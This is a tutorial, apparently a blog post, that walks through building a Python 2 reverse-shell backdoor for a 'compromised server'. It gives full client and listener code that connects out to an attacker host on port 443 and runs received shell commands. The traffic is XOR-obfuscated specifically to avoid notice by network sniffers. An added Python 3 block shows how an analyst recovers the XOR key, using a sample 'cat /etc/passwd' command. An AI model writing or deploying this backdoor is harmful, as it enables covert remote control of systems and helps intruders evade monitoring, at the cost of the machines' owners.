
Python backdoor with reverse connection and basic encryption

🎃 kr0m

In this short tutorial we will see how to program a very basic backdoor with support for reverse connections and obfuscation of its network traffic, so that anyone watching the traffic with some kind of sniffer does not notice anything unusual. The idea is to simulate a remote shell on the compromised server.

The encryption used is very basic; rather than encryption, it is better described as a way of obfuscating the commands to be executed, so that they do not attract much attention from anyone looking at the network traffic with a sniffer.

It consists of XORing each character of the command with the character A, which in the ASCII table is (CHAR/Dec/Hex/Bin): A/65/0x41/%01000001.

Therefore, if we write the char A, B or C:

  char A:                        char B:                        char C:
    %01000001 (A)                  %01000010 (B)                  %01000011 (C)
  ^ %01000001 (key A)            ^ %01000001 (key A)            ^ %01000001 (key A)
    %00000000 -> 0 -> ^@           %00000011 -> 3 -> ^C           %00000010 -> 2 -> ^B

Having written ABC in the network traffic, only ^@^C^B would be seen.
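As an added example (not code from the original post), here is the same single-byte XOR written in Python 3, together with the check an analyst would run on a captured payload: because the key is one fixed byte and XOR is its own inverse, there are only 256 candidate keys, and a printable-ASCII scoring heuristic picks out the right one without ever knowing it. The key constant, the list of shell tokens and the sample command are assumptions chosen for the demonstration.

```python
# Added example (not from the original post): the post's single-byte XOR
# "encryption" in Python 3, plus the recovery check a network analyst would
# run on a captured payload. A fixed one-byte key leaves only 256 candidates,
# so the command can be recovered from the wire bytes without the key.
import string
from typing import Tuple

KEY = 0x41  # the post's key: the character 'A' (assumption: same key as the post)


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with a single-byte key. Applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def control_notation(data: bytes) -> str:
    """Render bytes the way the post's table does (^@, ^C, ...)."""
    out = []
    for b in data:
        if b < 0x20:
            out.append("^" + chr(b + 0x40))  # control byte -> caret notation
        elif b == 0x7F:
            out.append("^?")
        else:
            out.append(chr(b))
    return "".join(out)


# Constructed heuristic inputs: printable ASCII set and a few common shell tokens.
PRINTABLE = set(string.printable.encode())
SHELL_HINTS = (b"ls", b"cat", b"/bin/", b"whoami", b"uname", b"/etc/")


def score_plaintext(candidate: bytes) -> int:
    """Higher score = more plausible shell command. 0 if any byte is non-printable."""
    printable = sum(1 for b in candidate if b in PRINTABLE)
    if printable != len(candidate):
        return 0  # a real shell command contains no non-printable bytes
    hits = sum(1 for tok in SHELL_HINTS if tok in candidate)
    return printable + 10 * hits


def recover_key(ciphertext: bytes) -> Tuple[int, bytes]:
    """Try all 256 single-byte keys; return the best-scoring (key, plaintext)."""
    best_key, best_plain, best_score = 0, b"", -1
    for k in range(256):
        plain = xor_bytes(ciphertext, k)
        s = score_plaintext(plain)
        if s > best_score:
            best_key, best_plain, best_score = k, plain, s
    return best_key, best_plain


if __name__ == "__main__":
    # The post's table: 'ABC' XOR 'A' -> ^@ ^C ^B
    print(control_notation(xor_bytes(b"ABC")))
    # Constructed sample: the bytes that would cross the wire for one command,
    # then what an analyst who captured them (and not the key) gets back.
    wire = xor_bytes(b"cat /etc/passwd")
    recovered_key, command = recover_key(wire)
    print(hex(recovered_key), command)
```

Running the block prints the post's ^@^C^B for ABC, then the recovered key 0x41 and the decoded sample command. That a few lines of scoring recover the plaintext from the wire bytes alone is exactly why the post calls this scheme obfuscation rather than encryption.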

Once the obfuscation has been explained, let’s move on to the client code:

#!/usr/bin/python
# Python 2 code, as in the original post (str/bytearray semantics are Python 2).
import socket,subprocess,sys

RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

while True:
    data = s.recv(1024)

    # Decode the command to be executed by applying the XOR
    de_data = bytearray(data)
    for i in range(len(de_data)):
        de_data[i] ^= 0x41

    # Execute the command via subprocess
    comm = subprocess.Popen(str(de_data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    STDOUT, STDERR = comm.communicate()

    # Encode the command output and send it to the remote host
    en_STDOUT = bytearray(STDOUT)
    for i in range(len(en_STDOUT)):
        en_STDOUT[i] ^= 0x41
    s.send(en_STDOUT)
s.close()

Now, the server code:

#!/usr/bin/python
# Python 2 code, as in the original post (print statement, raw_input).
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2)
print "Listening on port 443... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip

while True:
    # Encode the command to be executed and send it
    command = raw_input('~$ ')
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^= 0x41
    client.send(encode)

    # Decode the output of the remote command
    en_data = client.recv(2048)
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^= 0x41
    print decode

client.close()
s.close()